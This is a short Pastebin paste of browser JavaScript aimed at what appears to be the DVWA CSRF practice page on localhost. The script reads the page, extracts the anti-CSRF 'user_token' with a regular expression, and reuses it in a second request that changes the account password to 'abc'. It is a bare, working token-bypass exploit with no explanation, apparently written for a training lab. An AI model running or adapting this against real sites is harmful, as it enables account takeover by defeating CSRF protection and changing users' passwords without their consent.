Advertisement
Guest User

Untitled

a guest
Oct 23rd, 2019
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var http = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  2. http.open("GET","https://127.0.0.1/vulnerabilities/csrf/", false)
  3. http.send()
  4. var text = http.responseText;
  5. console.log(text)
  6. var matches = /name='user_token' value='(.*)'/.exec(text);
  7. var token = matches[1]
  8. console.log(token)
  9.  
  10.  
  11.  
  12. var http2 = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  13. http2.open("GET","https://127.0.0.1/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change&user_token=" + token, false)
  14. http2.send()
  15. console.log(http2.responseText)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement